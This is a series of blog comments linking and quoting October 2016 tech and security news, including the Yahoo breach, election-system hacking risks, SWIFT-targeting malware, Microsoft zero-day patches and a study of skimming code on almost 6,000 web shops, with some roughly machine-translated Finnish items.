Source: http://www.tivi.fi/Kaikki_uutiset/cia-nakee-viisi-paivaa-tulevaisuuteen-6589084
More:
The CIA Says It Can Predict Social Unrest as Early as 3 to 5 Days Out
http://www.defenseone.com/technology/2016/10/cia-says-it-can-predict-social-unrest-early-3-5-days-out/132121/?oref=DefenseOneTCO
Tomi Engdahl says:
Why 2016 Is a Little Like 1984
http://www.eetimes.com/author.asp?section_id=36&doc_id=1330581&
The vision of artificial intelligence is becoming a reality in a different and more nuanced way than technologists once imagined.
Wafer-thin smartphones more powerful than a 486 PC are common, and everyone assumes they can connect to one big network that holds all the world’s information. It’s amazing, and a little scary.
At least for today, it turns out those intelligent agents people talked about are the products of a handful of companies that own giant collections of data centers. They include Apple, Amazon, Facebook, Google — and the world’s largest governments.
Most of the agents are what spy novels call double agents. They serve two masters — a consumer like you and me and their owner with the big data center.
Ostensibly the agents come free with an iPhone, a Facebook account or an Amazon Echo. Their real cost is they share their data with their vendor who resells it to his paying customers. As Peter Clarke, my colleague from EE Times Europe, puts it, “these days you are either selling or being sold.”
Few expected it would turn out this way. The visionaries weren’t predicting a World Wide Web, massively parallel distributed computing or the current kerosene — an emerging family of neural networking algorithms that run on those distributed data centers.
Today’s agents are still in their infancy.
So in 2016, the landscape seems set for a battle among a handful of intelligent agents poised to become giants. Consumers and OEMs need to decide carefully which they will partner with and on what terms.
Arguably science fiction writers like George Orwell saw this coming long before the PC arrived. It took folks like Edward Snowden to make it clear that 2016 is in a way 1984.
Tomi Engdahl says:
One U.S. Election-System Vendor Is Using Developers in Serbia
https://politics.slashdot.org/story/16/10/09/0020210/one-us-election-system-vendor-is-using-developers-in-serbia
The Open Source Election Technology Foundation is trying to move U.S. voting machines from “proprietary, vendor-owned systems to ones that are owned ‘by the people of the United States.’” But in the meantime, Slashdot reader dcblogs brings this report from ComputerWorld:
One major election technology company, Dominion Voting Systems, develops its systems in the U.S. and Canada but also has an office in Belgrade, Serbia. It was recently advertising openings for four senior software developers in Belgrade… Dominion said it takes measures “to ensure the accuracy, integrity and security of the software we create for our products….”
One election-system vendor uses developers in Serbia
Election-system development is not unlike other software development
http://www.computerworld.com/article/3126791/election-hacking/one-election-system-vendor-uses-developers-in-serbia.html
Voting machines are privately manufactured and developed and, as with other many other IT systems, the code is typically proprietary.
he use of proprietary systems in elections has its critics. One Silicon Valley group, the Open Source Election Technology Foundation, is pushing for an election system that shifts from proprietary, vendor-owned systems to one that that is owned “by the people of the United States.”
But today, election system makers can operate in much the same manner as any vendor to build code; that includes using overseas developers.
One major election technology company, Dominion Voting Systems (DVS), develops its systems in the U.S. and Canada but also has an office in Belgrade, Serbia.
he software “is subjected to rigorous review, analysis, testing and certification by election authorities at the federal, state and local level, including the federal Election Assistance Commission,” said Riggall. The election system purchasing is managed by states and local governments. Once the code is certified, any changes require a new round of certification testing by election authorities, he said.
Paller said that “one shouldn’t feel complacent about maintaining software development and manufacturing all within the United States because foreign agencies have successfully placed technically competent spies on the payroll of American technology companies.”
Tomi Engdahl says:
Kelly Fiveash / Ars Technica UK:
UK targets internet trolls with new legal guidelines; those engaging in doxxing, baiting, derogatory hashtags, and virtual mobbing could face jail — Trolls who hurl abuse at others online using techniques such as doxxing, baiting, and virtual mobbing could face jail, the UK’s top prosecutor has warned.
UK’s chief troll hunter targets doxxing, virtual mobbing, and nasty images
Top prosecutor warns “ignorance isn’t a defence and perceived anonymity isn’t an escape.”
http://arstechnica.co.uk/tech-policy/2016/10/cps-guidelines-doxxing-virtual-mobbing-baiting/
Trolls who hurl abuse at others online using techniques such as doxxing, baiting, and virtual mobbing could face jail, the UK’s top prosecutor has warned.
New guidelines have been released by the Crown Prosecution Service to help cops in England and Wales determine whether charges—under part 2, section 44 of the 2007 Serious Crime Act—should be brought against people who use social media to encourage others to harass folk online.
http://www.legislation.gov.uk/ukpga/2007/27/section/44
Tomi Engdahl says:
Raphael Satter / Associated Press:
Yahoo disabled email forwarding feature at beginning of October, making it unnecessarily difficult for users to leave service amid coverage of record breach
Amid breach talk, some Yahoo users finding it hard to exit
http://hosted.ap.org/dynamic/stories/U/US_TEC_YAHOO_BREACH?SITE=AP&SECTION=HOME&TEMPLATE=DEFAULt
Tomi Engdahl says:
UK targets doxxing, hashtags and more in online troll crackdown
The Crown Prosecution Service gives prosecutors a better idea of what constitutes social media harassment.
https://www.engadget.com/2016/10/10/uk-government-cps-online-trolls/
Over the course of the year, the UK government has attempted to crack down internet abuse by introducing new guidelines for prosecutors and forming a new troll-hunting police unit. Those updates ensured that anyone creating websites or fake online profiles with the intention to humiliate someone could be punished, but the Crown Prosecution Service (CPS) has today added a new list of offences aimed at bringing trolls to justice.
Prosecutors have been told that anyone indulging in “virtual mobbing” campaigns — where a person encourages others to target and abuse users on Twitter or Facebook — can now be charged under the Serious Crime Act 2007.
Tomi Engdahl says:
Verizon CEO dismisses report of $1bn discount on hacked Yahoo as ‘total speculation’
http://www.ibtimes.co.uk/verizon-ceo-dismisses-report-1bn-discount-hacked-yahoo-total-speculation-1585764?
Verizon CEO Lowell McAdam has dismissed reports regarding his company seeking to lower the price of Yahoo following the disclosure of the massive 2014 data breach, wherein 500 million user accounts were stolen.
McAdam also revealed that he was not shocked by the much-discussed hack that compromised sensitive user information including names, email addresses, phone numbers, birth dates and encrypted passwords of “at least” 500 million user accounts in late 2014.
“We all live in an internet world. It’s not a question of if you’re going to get hacked but when you are going to get hacked,” McAdam said.
“The industrial logic to doing this merger still makes a ton of sense,” he said. “I have spent a lot of time over the past weeks with folks from Yahoo and I am very impressed by their capability.”
Tomi Engdahl says:
Open Whisper Systems:
Signal adds self-destructing messages, safety numbers, and QR codes to verify end-to-end encryption between users, to iOS, Android, and desktop apps
Disappearing messages for Signal
https://whispersystems.org/blog/disappearing-messages/
The latest Signal release for iPhone, Android, and Desktop now includes support for disappearing messages.
With this update, any conversation can be configured to delete sent and received messages after a specified interval. The configuration applies to all parties of a conversation, and the clock starts ticking for each recipient once they’ve read their copy of the message.
Disappearing messages are a way for you and your friends to keep your message history tidy.
The disappearing timer values range from five seconds to one week,
This release also includes support for Signal Protocol’s numeric fingerprint format, which are called “safety numbers” in Signal.
Safety numbers can be verified by either scanning a QR code or by reading a string aloud.
As always, all of our code is free, open source, and available on GitHub.
https://github.com/whispersystems
Tomi Engdahl says:
Someone is pulling pages off Google with bogus defamation claims
http://www.theverge.com/2016/10/10/13234558/google-defamation-takedown-deindex-scam-reputation-management
Someone has perfected a playbook for pulling webpages off Google, according to a new post by UCLA lawyer Eugene Volokh. Volokh finds a series of unusual court cases that resulted in web pages being de-indexed by Google, making them unavailable to search or other services. In some cases, reputation management firms were apparently charging as much as $6,000 a month for the service.
Google will generally de-index pages if it receives a credible report that the page contains pirated content or defamatory statements. The reports are available in a public archive, and the vast majority of them concern pirated content. The standard for a successful request can be somewhat complex, but a legal injunction against the offending party is typically sufficient to de-index a site, making it effectively invisible to Google searches.
Volokh seems to have uncovered a way of gaming that system, giving bad actors the power to de-index any site they want. In the cases he describes, plaintiffs file lawsuits against dummy defendants who immediately agree to the proposed injunctions against them. The cases never see trial, and in many cases, the defendants themselves seem not to exist — but they exist long enough to get a court-approved injunction that can be sent to Google to de-index the site.
Dozens of suspicious court cases, with missing defendants, aim at getting web pages taken down or deindexed
https://www.washingtonpost.com/news/volokh-conspiracy/wp/2016/10/10/dozens-of-suspicious-court-cases-with-missing-defendants-aim-at-getting-web-pages-taken-down-or-deindexed/?postshare=6791476107006382&tid=ss_fb&utm_term=.2751668f1e23
Tomi Engdahl says:
US Military Is Looking At Blockchain Technology To Secure Nuclear Weapons
https://news.slashdot.org/story/16/10/11/2045240/us-military-is-looking-at-blockchain-technology-to-secure-nuclear-weapons
Blockchain technology has been slow to gain adoption in non-financial contexts, but it could turn out to have invaluable military applications. DARPA, the storied research unit of the U.S. Department of Defense, is currently funding efforts to find out if blockchains could help secure highly sensitive data, with potential applications for everything from nuclear weapons to military satellites.
Even the US military is looking at blockchain technology—to secure nuclear weapons
http://qz.com/801640/darpa-blockchain-a-blockchain-from-guardtime-is-being-verified-by-galois-under-a-government-contract/
Blockchain technology has been slow to gain adoption in non-financial contexts, but it could turn out to have invaluable military applications. DARPA, the storied research unit of the US Department of Defense, is currently funding efforts to find out if blockchains could help secure highly sensitive data, with potential applications for everything from nuclear weapons to military satellites.
The case for using a blockchain boils down to a concept in computer security known as “information integrity.” That’s basically being able to track when a system or piece of data has been viewed or modified. DARPA’s program manager behind the blockchain effort, Timothy Booher, offers this analogy: Instead of trying to make the walls of a castle as tall as possible to prevent an intruder from getting in, it’s more important to know if anyone has been inside the castle, and what they’re doing there.
A blockchain is a decentralized, immutable ledger. Blockchains can permanently log modifications to a network or database, preventing intruders from covering their tracks. In DARPA’s case, blockchain tech could offer crucial intelligence on whether a hacker has modified something in a database, or whether they’re surveilling a particular military system.
“Whenever weapons are employed … it tends to be a place where data integrity in general is incredibly important,” Booher says. “So nuclear command and control, satellite command and control, command and control in general, [information integrity] is very important.”
The prospect of the US military using a blockchain to secure critical data could spark a boom in uses of the technology outside finance. Investors poured $134 million into blockchain startups in the first quarter of 2016, according to research by trade publication CoinDesk. These firms have focused overwhelmingly on financial applications to date. But information security represents a huge new market for blockchain tech vendors, accounting for $75 billion in spending last year, and projected to hit $108 billion in 2019, according to forecasts by market research firm Gartner.
Tomi Engdahl says:
‘StrongPity’ malware infects users through illegitimate WinRAR and TrueCrypt installers
https://www.neowin.net/news/strongpity-malware-infects-users-through-legitimate-winrar-and-truecrypt-installers
A new strain of malware has been discovered by Kaspersky Labs, named ‘StrongPity,’ which targets users looking for two legitimate computer programs, WinRAR and TrueCrypt. WinRAR is a file archiver utility for Windows, which compresses and extracts files, while the latter is a discontinued encryption tool.
The malware contains components that not only has the ability to give attackers complete control on the victim’s computer, but also steal disk contents and download other software that the cybercriminals need. It was found that users in Italy and Belgium were affected the most, but there were also records found in Turkey, North Africa, and the Middle East.
To be able to gather victims, the attackers have built special fake websites that supposedly host the two programs.
Tomi Engdahl says:
Spy fraud
Taxpayers are paying intelligence contractors to browse Facebook, watch porn, and commit crimes
https://news.vice.com/story/us-taxpayers-are-paying-intelligence-contractors-to-browse-facebook-watch-porn-and-commit-crimes
When contractors and employees who work for America’s most powerful intelligence agencies get bored at work, they sometimes kill time by viewing pornography on their government computers, browsing online dating services, engaging in “sex chats” with minors, and playing games on Facebook.
And they charge U.S. taxpayers millions of dollars for it.
Tomi Engdahl says:
Insurance company realized: the old bag of tricks are not enough anymore to secure the information
The insurance company LähiTapiola transferred the cyber security emphases proactive direction. To this end, it has partnered with Nixu.
LähiTapiola develop their security purposefully moving cyber security main focus of the business in terms of detection, analysis and a rapid and effective response to major threats.
“We have moved with a service provided by Nixu that allows control of security incidents in their observation. It is the lifeblood of digitalized, networked and well in complex business environments, ”
Sgned a cooperation agreement, which includes Nixu Cyber Defense Center (CDC) information security service.
Source: http://www.tivi.fi/Kaikki_uutiset/vakuutusyhtio-huomasi-vanhat-konstit-eivat-riita-enaa-tiedon-turvaamiseen-6589919
Tomi Engdahl says:
Burger barn put cloud on IT menu, burned out its developers
Move to the cloud and you may need ‘vendor managers’ and more governance
http://www.theregister.co.uk/2016/10/12/burger_barn_put_cloud_on_it_menu_burned_out_its_developers/
tale of replacing bespoke business applications with bits of Oracle’s cloud.* Doing so has made for interesting news on his sub-20 IT team, especially for the team of five developers. They’re on the way out because with the old code gone, the old coders can go too.
In their place, Nolte said he’ll hire “vendor managers,” people skilled in maintaining relationships with vendors, keeping contracts humming along nicely and negotiating for the new stuff that Hungry Jack’s needs. Nolte thinks some of his developers have the brains to make the jump to this new role, but not the proclivity. He characterised his developers as “fiddlers and tweakers” who are unlikely to abandon their coding careers.
Another quick lesson in Australian institutions: the nation’s dominant auto club is the National Roads and Motorists Association (NRMA)
Kotatko has just signed up for a marketing cloud and said one of the problems it has created is it’s too easy to run campaigns, because she and her team now have lots of data at their fingertips. She’s therefore been surprised at the amount of governance she has to do, lest marketers go wild with campaigns that target people from the wrong lists, breaching policy or good taste along the way.
No, software-as-a-service won’t automatically simplify operations and cut costs
Doing SaaS right needs at least half-a-dozen add-ons
http://www.theregister.co.uk/2016/10/11/no_softwareasaservice_wont_automatically_simplify_operations_and_cut_costs/
The Register has been asking around about what it takes to do SaaS right and has come to believe that among the tools you’ll probably need are:
Backup, which may seem an odd item on a SaaS shopping list given vendors’ promises of super-redundant data centres that never go down.
Data Loss Protection (DLP) Whether your data is on-premises or in a SaaS application, you need to make sure it can’t fall into the wrong hands. Most SaaS apps don’t have native DLP, the technology that monitors data to ensure sensitive material isn’t being e-mailed to unknown parties, saved onto removable storage media or otherwise exfiltrated. DLP’s become a standard issue on-premises security technology. It’s a no-brainer for SaaS users
Context-aware security Imagine you work in London and that one afternoon, a few hours after you last logged in on a known good IP address, someone logs into your SaaS account from Eastern Europe with an unrecognised IP address.
Cloud Access Service Brokers (CASBs) Now imagine you use multiple SaaS applications and that the context-sensitive logon and DLP policy described above needs to be implemented in all of them.
Interconnect services Users hate even short delays when using software and that doesn’t change with SaaS. On your own networks, you can control the user experience. But SaaS nearly always has to traverse a big slab of the the public internet … unless you pay for interconnect services that the likes of Equinix and Digital Realty offer to pave a fast lane between you and your preferred SaaS applications
Mobile device management A very good reason to adopt SaaS is that most applications are ready to roll on mobile devices from day one.
Will SaaS vendors explain this stuff?
Tomi Engdahl says:
Firm Linked to Social Media Surveillance Loses Data Access
http://www.securityweek.com/firm-linked-social-media-surveillance-loses-data-access
Washington – Twitter and Facebook on Tuesday cut access to certain data for an analytics firm which according to a civil liberties group helped law enforcement track protesters in social movements.
The announcements came after the American Civil Liberties Union reported that the analytics firm Geofeedia had been marketing its services to local police agencies to help track activists using social media posts and location data.
Tomi Engdahl says:
G7 Boost Banking Cybersecurity as New SWIFT Threat Emerges
http://www.securityweek.com/g7-boost-banking-cybersecurity-new-swift-threat-emerges
The G7 group of leading economies laid out a new framework for battling the hacking of financial institutions Tuesday as a new threat using the SWIFT interbank network emerged.
Reacting to a rise in hacking incidents that have robbed banks of everything from client databases to hundreds of millions of dollars, the G7 group issued a set of principles for banks to implement cybersecurity programs.
“The recent incident involving the SWIFT network and other cyberattacks really underscore the imperative for robust cyber security throughout the global financial sector,” said US Treasury Deputy Secretary Sarah Bloom Raskin.
“These threats have not destabilized the financial sector but they threaten to destabilize it,” she said.
Raskin is co-chair of the Cyber Expert Group of the G7 — the United States, Canada, France, Germany, Italy, Japan, and the United Kingdom.
The two-page “Fundamental Elements of Cybersecurity” outlines the building blocks of an effective risk-based bank program to defend itself and the broader financial system from cyber threats.
The guidelines are aimed at public and private sector financial institution board members and top management to use for shaping and assessing their company’s cyber strategy.
The stunning theft earlier this year of $81 million from Bangladesh’s central bank drew attention to the vulnerabilities of financial sector institutions to cyber threats, especially those using the SWIFT worldwide network for interbank transfers.
“The challenge with cyber security is that the threat vectors can be difficult to discern and are constantly morphing in search of financial sector vulnerabilities,” said Raskin.
That issue was underscored Tuesday when computer security group Symantec issued a warning over a new malware threat to financial organizations called “Odinaff”.
Odinaff has been deployed widely around the world since January 2016 in attacks that “appear to be extremely focused on organizations operating in the banking, securities, trading, and payroll sectors,” it said.
New Trojan Used in Attacks Against SWIFT Member Banks
http://www.securityweek.com/new-trojan-used-attacks-against-swift-member-banks
A second hacking group has been targeting SWIFT banks, according to a new report from Symantec. The group is thought to be, or be linked to, Carbanak; and is not believed to have any direct connection to the Lazarus group thought to be behind the theft of $81 million from the Bangladesh central bank and attacks in Vietnam and Ecuador earlier this year.
The discovery comes with the analysis of a new trojan found to be infecting several Symantec customers. The trojan has been called Trojan.Odinaff. Symantec reports that has been targeting “a number of financial organizations worldwide… focused on organizations operating in the banking, securities, trading, and payroll sectors.”
Tomi Engdahl says:
Preventing Account Creation Fraud with Two-Factor Authentication
http://www.securityweek.com/preventing-account-creation-fraud-two-factor-authentication
Recent reports of fraudulent account creation by employees at large banks to generate a boost in fees have raised many questions. How can such practices grow to such an immense scale? Wells Fargo has admitted to firing 5,300 employees for opening over 1.5 million unauthorized bank and credit card accounts. With allegations that the practice is more widespread, there is a real need to consider preventative measures.
How can an employee create fake accounts?
To address the question of consumer control, we must first consider how bank employees create fake accounts.
How much access should employees have?
This raises the question of the level of access that should be afforded to employees. Certainly there are legitimate reasons for employees to interact with customer accounts, but for an activity such as opening an account or transferring an entire balance, shouldn’t there be a higher bar for access?
Perhaps regulators need to consider mandating implementation of two-factor authentication (2FA) for significant account management activities. Only the account owner (or legal guardian/trustee) should be making these kind of transactions, which aren’t an everyday occurrence.
How can 2FA be implemented for the masses in a cost-effective manner?
2FA costs skyrocket when extra hardware such as hard tokens or biometric scanners are involved. In response to this challenge, the ubiquity of mobile devices certainly positions them as a logical platform for granting 2FA. But, the recent National Institute of Standards and Technology (NIST) recommendation against the use of SMS tokens for 2FA means that older non-smart phones aren’t preferable for this purpose, which excludes a significant portion of the population using older technology. Additionally, the authentication method in use should be usable across multiple mediums – whether banking online, on the phone or in person.
2FA is becoming more mainstream for businesses; however, businesses need to consider how 2FA should be implemented to maintain both external and internal control. According to a recent Ponemon Institute Research Report, “75 percent of respondents say a single-factor authentication approach, including username and password, can no longer effectively prevent unauthorized access to information resources.”
Tomi Engdahl says:
Moscow Says U.S. Hacking Claims ‘Flattering’, But False
http://www.securityweek.com/moscow-says-us-hacking-claims-flattering-false
Russian Foreign Minister Sergei Lavrov on Wednesday said that US claims Moscow is meddling in the American election process are “flattering” but baseless.
Lavrov shrugged off US allegations that Russia has directed cyber attacks against American political organizations in a bid to influence the November 8 vote.
“It’s flattering of course to get this kind of attention for a regional power, as President Obama called us some time ago,” Lavrov told CNN.
“Now everybody in the United States is saying that it is Russia which is running the (US) presidential debate.”
But Lavrov insisted that there is not a “single fact, a single proof” to back Washington’s accusations.
President Vladimir Putin also struck back at Washington on Wednesday.
Tomi Engdahl says:
Endpoint Security Wars: Is Peace Breaking Out?
http://www.securityweek.com/endpoint-security-wars-peace-breaking-out
In May 2016 VirusTotal (VT) changed its rules. Any vendor wishing to receive antivirus results via the VT API would in future be required to integrate its own detection scanner into the public VT interface. Furthermore, such vendors would need to be certified by The Anti-Malware Testing Standards Organization (AMTSO).
Tomi Engdahl says:
Microsoft Patches 4 Vulnerabilities Exploited in the Wild
http://www.securityweek.com/microsoft-patches-4-vulnerabilities-exploited-wild
Microsoft’s latest security bulletins patch tens of vulnerabilities affecting the company’s products. Four of the 36 unique CVE identifiers cover flaws that have been exploited in the wild.
One of the zero-day vulnerabilities, tracked as CVE-2016-3298, has been described by Microsoft as an information disclosure issue affecting Internet Explorer.
Another zero-day, identified as CVE-2016-7189, affects the Edge web browser and it can be exploited for remote code execution by getting the victim to access a malicious website.
The third flaw exploited in the wild, CVE-2016-3393, is a Windows graphics (GDI) component issue that can be leveraged to remotely execute arbitrary code and gain control of the affected system.
The last zero-day patched by Microsoft this week affects Office and it can be exploited for remote code execution via specially crafted RTF files.
Tomi Engdahl says:
Junos OS CLI has a bad bug. So good luck applying its new patches
Gin palace has eight bug-killing shots for you to imbibe
http://www.theregister.co.uk/2016/10/13/juniper_networks_emits_a_bunch_of_bugfixes/
Juniper user? Feeling smug because you didn’t have to race to download the latest Cisco patch round? Sorry: Juniper has just emitted eight vulnerability patches of its own.
Let’s start with this advisory, since it’s rated critical.
The Junos Space network management system has a crop of vulnerabilities, some of which are remotely exploitable. Version 15.2R2 splats bugs including authentication bugs, badly-validated SSH keys, a cross-site request forgery vulnerability, command injection, cross-site scripting and XML injection.
The patches cover various Mozilla components, DHCP services, a Xen x86 emulator bug from last year, 2013′s “Motochopper” bug, OpenSSL bugs and more.
2016-10 Security Bulletin: Junos Space: Multiple vulnerabilities
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10760&cat=SIRT_1&actp=LIST
Tomi Engdahl says:
This month’s critical Flash vulnerability gives attackers control of a Mac …
https://9to5mac.com/2016/10/12/critical-flash-vulnerability-mac/
You can check your current version of Flash
If it’s not 23.0.0.185, you need to upgrade urgently
Check version at http://www.adobe.com/software/flash/about/?sdid=XKMMHJ2P
Tomi Engdahl says:
Could Determined Hackers Change the Outcome of the Election?
http://www.designnews.com/author.asp?section_id=1395&doc_id=281795&cid=nl.x.dn14.edt.aud.dn.20161013.tst004c
It would be difficult and highly unlikely, but it’s certainly possible for computer hackers to change the outcome of next month’s presidential election, experts say.
“I’m not sure that a single hacker could do it alone,” Eugene H. Spafford, professor of computer science at Purdue University, told Design News. “But an organized team that’s well financed and has enough time could in fact change the outcome of the election.”
Concern over potential security threats has grown in the last few months in the wake of attacks by Russian hackers on voter databases in Illinois and Arizona. In the Illinois attack, the personal information of approximately 200,000 voters was hacked. In Arizona, hackers stole the user name and password of at least one election official earlier this year.
Security experts who have testified before Congress say there’s reason for concern. Dan S. Wallach, a professor of computer science at Rice University, recently told a House sub-committee that “our election systems face credible cyber-threats; it’s prudent to adopt contingency plans before November to mitigate these threats.”
Spafford told us that it wouldn’t take a major effort to introduce confusion and chaos into the November election. “All the hackers would have to do is make it look as if tampering had occurred,” he said. “In a close election, it could cause controversy, lawsuits, and other problems. Look at the after-effects of the hanging chad in 2000. We’re still talking about it 16 years later.”
Experts strongly encouraged election districts around the country to use touch screen machines connected to printers that can create a paper trail. Unfortunately, voting districts in about a dozen states have no such machines.
The most vulnerable systems, however, are the voter registration databases, and the machines that count and report the votes. If registrations are removed from those databases, voters could be unable to cast ballots.
Polling place voting machines are a more difficult target for hackers, largely because those machines typically employ an “air gap” — that is, a physical separation from the Internet. Still, cyber experts are concerned with the possible entrance of malware.
“Those of us who have studied it believe that old-fashioned paper is still the best solution,” he told us. “Having a paper trail that people can look at and count is really important.”
Tomi Engdahl says:
The Cyber Risk of Mixing Business with Pleasure
http://www.securityweek.com/cyber-risk-mixing-business-pleasure
Technical and Process Controls for the Enterprise Must Extend to Employees and How They Engage in Personal Services
The ubiquitous use of social media has blurred the lines between business and personal lives. A lot has been written about the importance of keeping the two separate, with an emphasis on the potential risk to an individual’s reputation
But there’s another important reason why separating business from pleasure should be a concern – the potential for increased cyber risk to your business stemming from credential compromise to social media accounts.
Barely a week goes by without reports of a leaked database. At the same time, dumps of stolen credentials are regularly sold, traded and shared online across paste sites, file-sharing sites and online marketplaces. Credential compromise is not new, but how these credentials become available is often directly related to the lack of separation between business and pleasure.
Employees who have reused corporate emails and passwords for personal use can put their employers at risk of account takeovers, credential stuffing and extortion attempts.
Threat actors can automatically inject breached username and password pairs in order to fraudulently gain access to user accounts. This technique, known as credential stuffing, is a type of brute force attack whereby large sets of credentials are automatically inputted into websites until a match with an existing account is found.
Extortion attempts
Users received extortion emails threatening to share the exposed information
Set policies
• Establish a policy for which external services are allowed to be associated to corporate email accounts.
• Understand and monitor approved external services for password policies and formats to understand the risks and lowest common denominators.
Monitor activity
• Proactively monitor for credential dumps relevant to your organization’s accounts and evaluate these dumps to determine if the dumps are new or have been previously leaked, in which case you may have already addressed the matter.
• If you have any user behavior analytics capabilities, import compromised identity information and look for any suspicious activity (e.g., accessing resources that have not been accessed in the past.)
Educate employees
• Update security awareness training to include the risks associated with password reuse.
• Encourage staff to use consumer password management tools like 1Password or LastPass to also manage personal account credentials.
Tomi Engdahl says:
Want Better Security? Be a Pragmatist.
http://www.securityweek.com/want-better-security-be-pragmatist
I’ve always considered myself a pragmatist. Perhaps not surprisingly, I have also always been a big fan of pragmatism. I guess one goes along with the other. A pragmatist is defined as “a person who is oriented toward the success or failure of a particular line of action, thought, etc.; a practical person.” Aside from being a useful worldview, I would argue that being a pragmatist is the only way to improve the security posture of an organization. How can I make such a statement? Allow me to explain.
Perfect security on the portal is never going to happen. So, let’s boil it down to its essence. The security professional faces two choices:
1. Be a pragmatist, work collaboratively with the business to understand constraints and priorities, and focus on how security can be improved within that framework, or…
2. Be an ideologue, don’t seek to understand the constraints and priorities of the business, and demand changes that will not fit within the framework that the business is operating in.
Which approach do you think will land better results?
Whether we’re working on securing an enterprise, looking to gain visibility and response capability during a move to the cloud, trying to make software more secure, improving the security of web applications, building a security operations and incident response program, or any of the other important undertakings in the security field, we need to work as a partner and an advisor to the business. Time and time again, this has shown itself to be the only proven way to make progress toward the end goal of improving the organization’s security posture.
The modern security practitioner needs to be a pragmatist that works with the business to improve security without negatively impacting the business. Now, more than ever before
We’ve been so busy with ideology that we’ve forgotten to focus on what’s important — our end goals and the outcomes we desire. Most business people understand risk mitigation quite well. You’d be surprised what happens when you work collaboratively with the business. Educating the business about the risks and threats they face and constructively helping them to work towards mitigating those risks and threats has been repeatedly proven to improve security in practice.
Tomi Engdahl says:
Preparing for a cyber attack
An incident response (IR) plan is a vital component of cybersecurity strategy.
http://www.controleng.com/single-article/preparing-for-a-cyber-attack/94a0925cf7af1b782a258cca73791bc0.html?OCVALIDATE&ocid=101781
What was once an afterthought for oil and gas organizations, cybersecurity is now center stage. Cybersecurity impacts every facet of oil and gas operations, which are now more digital and connected than ever. As such, chief information security officers (CISO) understand that attacks are inevitable, and what counts today is how organizations respond to threats and their overall level of cyber-readiness.
Cybersecurity has similar traits to physical security. Many people have an alarm system in their house, not to prevent a break-in from occurring, but to immediately alert the house’s occupants, and authorities, when one happens. Further, while everything in a home may have value, the most valuable items are frequently stored in a safe for added protection.
Organizations are beginning to think about cybersecurity in the same way. As threats become more sophisticated, companies must acknowledge that attacks can’t necessarily be prevented, but fast response time and a secure environment for the most critical data and assets are key to building a strong cybersecurity position.
Cybersecurity attacks on energy organizations are more targeted than other industries, causing costly damage to operational technology (OT) environments. With an increasing number of connected devices and two very unique operating environments—IT and OT—the oil and gas sector’s greatest challenge is to establish clear and informative guidelines for people and processes during a cyber attack.
Despite having an incident response (IR) plan in place, very few oil and gas organizations run through full simulation exercises of this plan. Simulated exercises can reveal incorrect assumptions made during the IR process and also alert security leaders to gaping holes
Tomi Engdahl says:
Almost 6,000 online shops hit by hackers
http://www.bbc.com/news/technology-37643754
Almost 6,000 web shops are unknowingly harbouring malicious code that is stealing the credit card details of customers, suggests research.
The code has been injected into the sites by cyberthieves, said Dutch developer Willem De Groot.
He found the 5,925 compromised sites by scanning for the specific signature of the data-stealing code in website software.
Some of the stolen data was sent to servers based in Russia, he said.
Costly mistake
In a blogpost, Mr De Groot said the attacks exploited known vulnerabilities in several different widely used web retailing programs. Mr De Groot is co-founder and head of security at Dutch ecommerce site byte.nl
Having won access, the attackers injected a short chunk of obfuscated code that copied credit card and other payment information. Stolen data was being sold on dark web markets at a rate of about $30 (£25) per card, he said.
His research found nine separate types of skimming code on sites, suggesting many different crime groups were involved.
“I would recommend consumers to only enter their payment details on sites of known payment providers such as Paypal,” he told the BBC. “They have hundreds of people working on security, the average store probably has none.”
5900 online stores found skimming [analysis]
https://gwillem.github.io/2016/10/11/5900-online-stores-found-skimming/
Online skimming is just like physical skimming: your card details are stolen so that other people can spend your money. However, online skimming is more effective because a) it is harder to detect and b) it is near impossible to trace the thieves.
In short: hackers gain access to a store’s source code using various unpatched software flaws. Once a store is under control of a perpetrator, a (Javascript) wiretap is installed that funnels live payment data to an off-shore collection server (mostly in Russia). This wiretap operates transparently for customers and the merchant. Skimmed credit cards are then sold on the dark web for the going rate of $30 per card .
Online skimming gains popularity
Online skimming is a new form of card fraud. In November 2015, the first case was reported. Upon investigating, I scanned a sample of 255K online stores globally and found 3501 stores to be skimmed.
Victims vary from car makers (Audi ZA) to government (NRSC, Malaysia) to fashion (Converse, Heels.com), to pop stars (Bjork) to NGOs (Science Museum, Washington Cathedral).
754 stores who are skimming today, were already skimming in 2015. Apparently you can skim cards undisturbed for months.
Today, at least 9 varieties and 3 distinct malware families can be identified
Replies from worried merchants
I have manually reported several compromised shops and got some curious responses:
We don’t care, our payments are handled by a 3rd party payment provider
If someone can inject Javascript into your site, your database is most likely also hacked.
Thanks for your suggestion, but our shop is totally safe. There is just an annoying javascript error.
Or, even better:
Our shop is safe because we use https
Solutions
New cases could be stopped right away if store owners would upgrade their software regularly. But this is costly and most merchants don’t bother.
Tomi Engdahl says:
IT found the security insurances – “unnecessary security is not worth the cost”
The first security insurance in Finland brought an American insurance company AIG began in 2013. Second best Nordic insurance company If P & C for about one and a half years ago.
“Security insurance sales have picked up all the time,” If’s product manager Tapio says Valtonen at the reception.
According to him, the insurance-takers are particularly trade operators, IT companies, as well as professional services such as accounting and consultancy firms.
Security insurance typically reimburses the costs caused by a data breach detection of causes and effects, and restore the data. Insurance can also be replaced by a business interruption losses.
Demand may accelerate the EU’s new Data Protection Regulation. It requires companies to specifically address the safety of personal data and requires in the event of burglary, for example, to notify the data protection authority of the burglary. Insurance can replace the additional costs brought about by the application of the Regulation.
Source: http://www.tivi.fi/Kaikki_uutiset/it-ala-loysi-tietoturvavakuutukset-tarpeettomasta-turvasta-ei-kannata-maksaa-6590628
Tomi Engdahl says:
Washington Post:
Verizon general counsel says there’s a “reasonable basis” to believe Yahoo hack will have a “material” impact on deal — Verizon on Thursday said that it was leaning toward declaring as a “material” event the massive data breach disclosed three weeks ago by Yahoo …
Verizon just raised a big warning flag for Yahoo
https://www.washingtonpost.com/news/the-switch/wp/2016/10/13/verizon-just-raised-a-big-warning-flag-for-yahoo/
Verizon on Thursday signaled that Yahoo’s massive data breach disclosed three weeks ago was a significant event that could halt the telecom giant’s $4.8 billion purchase of the tech firm’s core business.
“I think we have a reasonable basis to believe right now that the impact is material,” Verizon General Counsel Craig Silliman said of the breach, speaking to a small group of reporters at a roundtable. A “material” effect in this case is one that would harm Yahoo’s financial value, and make the Web giant less attractive to purchase.
Now, revelations of Verizon’s internal deliberations threaten to cast an even bigger cloud over Yahoo’s future.
